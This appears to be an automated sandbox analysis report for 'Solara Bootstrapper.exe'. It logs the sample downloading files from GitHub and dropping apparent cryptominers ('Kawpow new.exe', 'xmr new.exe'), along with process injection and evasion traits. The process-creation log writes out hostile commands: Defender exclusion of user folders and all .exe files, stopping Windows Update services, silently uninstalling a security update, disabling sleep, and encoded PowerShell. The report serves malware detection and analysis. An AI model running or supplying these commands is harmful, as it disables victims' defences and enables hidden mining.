Source: C:\Windows\System32\lsass.exe	Code function: 68_2_00000140AE86DCE0 FindFirstFileExW,	68_2_00000140AE86DCE0

Source: global traffic	HTTP traffic detected: GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1Host: github.com

Source: Joe Sandbox View	IP Address: 185.199.109.133 185.199.109.133
Source: Joe Sandbox View	IP Address: 185.199.109.133 185.199.109.133
Source: Joe Sandbox View	IP Address: 140.82.121.3 140.82.121.3
Source: Joe Sandbox View	IP Address: 140.82.121.3 140.82.121.3

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic

Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49706 -> 140.82.121.3:443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /quivings/Solara/main/Storage/version.txt HTTP/1.1User-Agent: SolaraHost: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1Host: github.com

Source: global traffic	DNS traffic detected: DNS query: github.com
Source: global traffic	DNS traffic detected: DNS query: raw.githubusercontent.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Tue, 07 Jan 2025 15:09:09 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-WithCache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: AADD:29B7FE:662F5A:719583:677D4395Accept-Ranges: bytesDate: Tue, 07 Jan 2025 15:09:10 GMTVia: 1.1 varnishX-Served-By: cache-ewr-kewr1740055-EWRX-Cache: MISSX-Cache-Hits: 0X-Timer: S1736262550.984424,VS0,VE28Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *Cross-Origin-Resource-Policy: cross-originX-Fastly-Request-ID: 8babbe5f5a38ad2b58889605f76de69410d799f9Expires: Tue, 07 Jan 2025 15:14:10 GMTSource-Age: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Tue, 07 Jan 2025 15:09:09 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-WithCache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin

Source: powershell.exe, 00000001.00000002.2223359598.00000000054BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.2201684316.00000000045A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2201684316.00000000045A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.2201684316.0000000004451000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.2201684316.00000000045A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000001.00000002.2201684316.00000000045A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.2201684316.0000000004451000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBjq
Source: powershell.exe, 00000001.00000002.2223359598.00000000054BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.2223359598.00000000054BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2223359598.00000000054BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.2201684316.00000000045A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: Solara Bootstrapper.exe, 00000000.00000002.2099938407.00000000013D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zipK
Source: powershell.exe, 00000001.00000002.2223359598.00000000054BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: Solara Bootstrapper.exe, 00000000.00000002.2099938407.00000000013D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/quivings/Solara/main/Storage/version.txt

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.5:49705 version: TLS 1.2

System Summary

Uses powercfg.exe to modify the power settings

Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe

Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

Source: C:\Windows\System32\dialer.exe	Code function: 46_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,	46_2_00000001400010C0
Source: C:\Windows\System32\winlogon.exe	Code function: 53_2_000001E8589B28C8 NtEnumerateValueKey,NtEnumerateValueKey,	53_2_000001E8589B28C8
Source: C:\Windows\System32\dialer.exe	Code function: 63_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,	63_2_00000001400010C0
Source: C:\Windows\System32\lsass.exe	Code function: 68_2_00000140AE86202C NtQuerySystemInformation,StrCmpNIW,	68_2_00000140AE86202C
Source: C:\Windows\System32\lsass.exe	Code function: 68_2_00000140AE86253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,	68_2_00000140AE86253C

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0443B570	1_2_0443B570
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_08153E98	1_2_08153E98
Source: C:\Windows\System32\conhost.exe	Code function: 2_2_0000019A497D1F2C	2_2_0000019A497D1F2C
Source: C:\Windows\System32\conhost.exe	Code function: 2_2_0000019A497E38A8	2_2_0000019A497E38A8
Source: C:\Windows\System32\conhost.exe	Code function: 2_2_0000019A497DD0E0	2_2_0000019A497DD0E0
Source: C:\Windows\System32\conhost.exe	Code function: 2_2_0000019A49802B2C	2_2_0000019A49802B2C
Source: C:\Windows\System32\conhost.exe	Code function: 2_2_0000019A4980DCE0	2_2_0000019A4980DCE0
Source: C:\Windows\System32\conhost.exe	Code function: 2_2_0000019A498144A8	2_2_0000019A498144A8
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Code function: 5_2_00EB0890	5_2_00EB0890
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Code function: 5_2_00EB0880	5_2_00EB0880
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_04F9B578	7_2_04F9B578
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_04F9B568	7_2_04F9B568
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_08FC3AA8	7_2_08FC3AA8
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 15_2_000001F43C51D0E0	15_2_000001F43C51D0E0
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 15_2_000001F43C5238A8	15_2_000001F43C5238A8
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 15_2_000001F43C511F2C	15_2_000001F43C511F2C
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 15_2_000001F43C54DCE0	15_2_000001F43C54DCE0
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 15_2_000001F43C5544A8	15_2_000001F43C5544A8
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 15_2_000001F43C542B2C	15_2_000001F43C542B2C
Source: C:\Windows\System32\dialer.exe	Code function: 46_2_000000014000226C	46_2_000000014000226C
Source: C:\Windows\System32\dialer.exe	Code function: 46_2_00000001400014D8	46_2_00000001400014D8
Source: C:\Windows\System32\dialer.exe	Code function: 46_2_0000000140002560	46_2_0000000140002560
Source: C:\Windows\System32\winlogon.exe	Code function: 53_2_000001E858981F2C	53_2_000001E858981F2C
Source: C:\Windows\System32\winlogon.exe	Code function: 53_2_000001E8589938A8	53_2_000001E8589938A8
Source: C:\Windows\System32\winlogon.exe	Code function: 53_2_000001E85898D0E0	53_2_000001E85898D0E0
Source: C:\Windows\System32\winlogon.exe	Code function: 53_2_000001E8589B2B2C	53_2_000001E8589B2B2C
Source: C:\Windows\System32\winlogon.exe	Code function: 53_2_000001E8589C44A8	53_2_000001E8589C44A8
Source: C:\Windows\System32\winlogon.exe	Code function: 53_2_000001E8589BDCE0	53_2_000001E8589BDCE0
Source: C:\Windows\System32\dialer.exe	Code function: 63_2_000000014000226C	63_2_000000014000226C
Source: C:\Windows\System32\dialer.exe	Code function: 63_2_00000001400014D8	63_2_00000001400014D8
Source: C:\Windows\System32\dialer.exe	Code function: 63_2_0000000140002560	63_2_0000000140002560
Source: C:\Windows\System32\lsass.exe	Code function: 68_2_00000140ADFC1F2C	68_2_00000140ADFC1F2C
Source: C:\Windows\System32\lsass.exe	Code function: 68_2_00000140ADFCD0E0	68_2_00000140ADFCD0E0
Source: C:\Windows\System32\lsass.exe	Code function: 68_2_00000140ADFD38A8	68_2_00000140ADFD38A8
Source: C:\Windows\System32\lsass.exe	Code function: 68_2_00000140AE86DCE0	68_2_00000140AE86DCE0
Source: C:\Windows\System32\lsass.exe	Code function: 68_2_00000140AE8744A8	68_2_00000140AE8744A8
Source: C:\Windows\System32\lsass.exe	Code function: 68_2_00000140AE862B2C	68_2_00000140AE862B2C

Source: Joe Sandbox View	Dropped File: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe 4C9D878E35E7FD497C633A770D3359FB37447985450DC19F45DB0925972C39E0
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\Kawpow new.exe 4C9D878E35E7FD497C633A770D3359FB37447985450DC19F45DB0925972C39E0

Source: Solara Bootstrapper.exe, 00000000.00000002.2099938407.00000000013D0000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameSolaraBootstrapper.exeF vs Solara Bootstrapper.exe

Source: Solara Bootstrapper.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: classification engine

Classification label: mal100.spyw.evad.winEXE@110/24@2/2

Source: C:\Windows\System32\dialer.exe	Code function: 46_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,		46_2_000000014000226C
Source: C:\Windows\System32\dialer.exe	Code function: 63_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,		63_2_000000014000226C

Source: C:\Windows\System32\dialer.exe

Code function: 46_2_00000001400019C4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,

46_2_00000001400019C4

Source: C:\Windows\System32\dialer.exe

Code function: 46_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,

46_2_000000014000226C

Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SolaraBootstrapper.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8176:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7716:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7992:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5492:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8008:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6540:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7808:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5960:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5428:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1372:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8168:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3292:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2300:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7944:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2964:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7856:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8120:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5448:120:WilError_03

Source: C:\Users\user\Desktop\Solara Bootstrapper.exe

File created: C:\Users\user\AppData\Local\Temp\kx new.exe

Jump to behavior

Source: Solara Bootstrapper.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Solara Bootstrapper.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Solara Bootstrapper.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Solara Bootstrapper.exe

ReversingLabs: Detection: 68%

Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Evasive API call chain: __getmainargs,DecisionNodes,exit			graph_0-82
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Evasive API call chain: __getmainargs,DecisionNodes,exit			graph_4-82

Source: unknown	Process created: C:\Users\user\Desktop\Solara Bootstrapper.exe "C:\Users\user\Desktop\Solara Bootstrapper.exe"
Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA="
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Process created: C:\Users\user\AppData\Local\Temp\kx new.exe "C:\Users\user\AppData\Local\Temp\kx new.exe"
Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Process created: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe "C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe"
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA="
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Process created: C:\Users\user\AppData\Local\Temp\Kawpow new.exe "C:\Users\user\AppData\Local\Temp\Kawpow new.exe"
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Process created: C:\Users\user\AppData\Local\Temp\xmr new.exe "C:\Users\user\AppData\Local\Temp\xmr new.exe"
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "CKTJZLMO"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
